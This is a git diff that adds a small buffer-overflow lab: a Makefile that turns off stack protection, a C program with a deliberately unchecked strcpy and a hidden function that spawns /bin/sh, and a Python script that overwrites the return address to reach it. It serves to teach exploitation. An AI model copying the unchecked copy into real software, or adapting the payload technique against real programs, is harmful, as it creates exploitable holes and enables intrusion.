4 files changed, 53 insertions, 0 deletions

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..d8f7879
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+vuln
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..351c218
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,13 @@
+CC = cc
+CFLAGS = -m32 -fno-stack-protector -no-pie -g
+WARNFLAGS = -Wno-deprecated-declarations -Wno-stringop-overflow
+SRC = vuln.c
+TARGET = vuln
+
+all: $(TARGET)
+
+$(TARGET): $(SRC)
+	$(CC) $(CFLAGS) $(WARNFLAGS) -o $(TARGET) $(SRC)
+
+clean:
+	rm -f $(TARGET)
diff --git a/exploit.py b/exploit.py
new file mode 100755
index 0000000..6ec37e5
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,14 @@
+#!/usr/bin/env python3
+import subprocess
+
+print("locating address of unused_function...")
+objdump_output = subprocess.check_output(['objdump', '-d', './vuln'], text=True)
+for line in objdump_output.split('\n'):
+    if '<unused_function>:' in line:
+        address_hex = line.split()[0]
+        address_bytes = bytes.fromhex(address_hex)[::-1]
+        print(f"found address (little endian): {str(address_bytes)}")
+        break
+
+payload = b'A' * 44 + address_bytes
+subprocess.run(["./vuln", payload])
diff --git a/vuln.c b/vuln.c
new file mode 100644
index 0000000..bd88a9d
--- /dev/null
+++ b/vuln.c
@@ -0,0 +1,25 @@
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+void unused_function() {
+	printf("you did it! ROP achieved, we never call this function\n");
+	printf("calling /bin/sh...\n");
+	system("/bin/sh");
+}
+
+void vuln(char* input) {
+	char buffer[32];
+	// copy input but dont check size, purposefully vulnerable so we can ROP our way through stuff
+	strcpy(buffer, input);
+	printf("Your argument was: %s\n", buffer);
+}
+
+int main(int argc, char** argv) {
+	if (argc != 2) {
+		printf("Usage: %s <string>\n", argv[0]);
+		return 1;
+	}
+	vuln(argv[1]);
+	return 0;
+}